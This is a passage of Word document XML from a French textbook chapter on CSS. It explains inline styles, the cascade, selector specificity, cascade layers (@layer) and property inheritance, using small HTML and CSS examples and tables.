            <w:tcW w:type="dxa" w:w="1653"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>style="color:red"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3305"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jamais, sauf courriel HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en ligne l'emporte sur toute feuille externe, sauf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Il mélange contenu et présentation, empêche la mise en cache et rend la maintenance impossible. Les générateurs de courriels y recourent parce que les clients de messagerie ignorent les feuilles externes : c'est une contrainte de format, pas un modèle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une organisation en couches, chargée dans l'ordre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&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="css/reset.css"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="css/style.css"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;link rel="stylesheet" href="css/print.css" media="print"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.3 La cascade : qui gagne ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lorsque plusieurs règles visent le même élément, le navigateur arbitre selon un ordre précis. Comprendre cet ordre évite l'usage réflexe de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>!important</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, qui transforme une feuille de style en champ de bataille.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3810000"/>
            <wp:docPr id="15" name="Picture 15"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f13.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3810000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.13 — L'ordre de la cascade, du plus faible au plus fort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">À origine égale, deux critères décident : la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>spécificité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> du sélecteur, puis l'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ordre d'apparition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — la règle la plus tardive l'emporte. La spécificité se calcule en trois compteurs : identifiants, classes et attributs, éléments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.30 — Quelques sélecteurs et leur poids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89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Sélecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="209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Spécificité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="402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Commentaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>0-0-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>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.intro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="209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0-1-0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="402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Une classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>#entete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1-0-0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un identifiant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>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nav a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="209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0-0-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="402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Deux éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>article .intro p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>0-1-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une classe, deux éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>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a:hover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="209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0-1-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="402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Pseudo-classe = classe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2897"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>style="..."</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1-0-0-0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4024"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En ligne, priorité supérieure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`!IMPORTANT` N'EST PAS UNE SOLUTION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Chaque </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>!important</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> en appelle un autre. Si vous devez en écrire, c'est que la structure des sélecteurs est mauvaise. La solution durable est de réduire la spécificité et d'organiser les couches (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@layer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Les couches CSS rendent l'ordre explicite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@layer reset, base, composants, utilitaires;</w:t>
        <w:br/>
        <w:br/>
        <w:t>@layer base {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  h1 { color: #0f2e4c; }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>@layer utilitaires {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .texte-rouge { color: #a63a32; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.4 Héritage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Certaines propriétés se transmettent des parents aux enfants — la couleur, la police, l'interligne — d'autres non : les marges, les bordures, le positionnement. Comprendre cette distinction évite d'écrire des règles inutiles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.31 — Sept propriétés et leur comportement d'héritage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0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Propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Héritée ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="450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Pourquoi</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>color</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un texte hérite de la couleur de son contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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font-family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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450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La typographie se propage</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>line-height</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>L'interligne suit la police</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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margin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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450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Chaque bloc gère ses espacements</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>border</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chaque élément a son cadre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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display</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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450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Le mode de boîte est local</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>background</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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4507"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
